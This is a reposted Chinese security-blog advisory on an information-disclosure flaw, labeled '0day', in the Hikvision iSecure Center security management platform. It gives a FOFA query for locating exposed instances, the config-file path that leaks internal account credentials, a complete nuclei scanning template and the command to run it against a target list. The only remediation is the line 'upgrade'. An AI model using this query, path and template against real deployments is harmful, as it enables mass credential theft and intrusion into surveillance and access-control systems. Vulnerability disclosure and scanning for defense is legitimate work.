【0day】海康威视综合安防管理平台信息泄露(内网集权账户密码)漏洞

admin 2024年2月17日01:22:43评论70 views字数 1168阅读3分53秒阅读模式

使

01

漏洞名称

海康威视综合安防管理平台信息泄露(内网集权账户密码)漏洞

02

漏洞影响

HIKVISION iSecure Center综合安防管理平台,版本不详

【0day】海康威视综合安防管理平台信息泄露(内网集权账户密码)漏洞

03

漏洞描述

HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,海康威视综合安防管理平台信息存在信息泄露(内网集权账户密码)漏洞,可以通过解密软件,解密用户名密码。

04

FOFA搜索语句
app="HIKVISION-综合安防管理平台"

【0day】海康威视综合安防管理平台信息泄露(内网集权账户密码)漏洞

05

漏洞复现

poc如下

/portal/conf/config.properties

使用浏览器访问

【0day】海康威视综合安防管理平台信息泄露(内网集权账户密码)漏洞

证明存在漏洞

06

nuclei poc

poc文件内容如下

id: hikvision-disclosureinfo:  name: 海康威视综合安防管理平台信息泄露漏洞  author: fgz  severity: high  reference:    - none  description: |    HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。存在信息泄露漏洞,密码解密后可以登录后台。  metadata:    fofa-query: app="HIKVISION-综合安防管理平台"    veified: true  tags: hikvisionhttp:  - method: GET    path:      - "{{BaseURL}}/portal/conf/config.properties"    matchers-condition: and    matchers:      - type: status        status:          - 200      - type: word        part: body        words:          - '@bic'          - 'username'          - 'password'        condition: and

运行POC

 .nuclei.exe -t .hikvision-disclosure.yaml -l .1.txt -me result

【0day】海康威视综合安防管理平台信息泄露(内网集权账户密码)漏洞

07

修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):【0day】海康威视综合安防管理平台信息泄露(内网集权账户密码)漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月17日01:22:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【0day】海康威视综合安防管理平台信息泄露(内网集权账户密码)漏洞https://cn-sec.com/archives/2133368.html

发表评论

匿名网友 填写信息